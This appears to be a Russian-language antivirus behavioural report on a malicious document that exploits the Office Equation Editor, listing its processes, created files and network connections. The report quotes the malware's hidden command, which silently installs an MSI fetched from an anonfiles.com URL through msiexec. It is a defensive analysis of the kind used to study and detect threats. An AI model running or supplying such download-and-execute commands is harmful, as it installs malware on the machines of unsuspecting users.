Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\cmd.exe' /c msiexec /q /i "https://cdn-03.anonfiles.com/X4Y8d44fo0/969b15d7-1590943712/tst.msi"
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
Сетевая активность
TCP
- 'cd####.anonfiles.com':443
- 'an###iles.com':443
UDP
- DNS ASK cd####.anonfiles.com
- DNS ASK an###iles.com
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c msiexec /q /i "https://cdn-03.anonfiles.com/X4Y8d44fo0/969b15d7-1590943712/tst.msi"' (со скрытым окном)
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\msiexec.exe' /q /i "https://cdn-03.anonfiles.com/X4Y8d44fo0/969b15d7-1590943712/tst.msi"
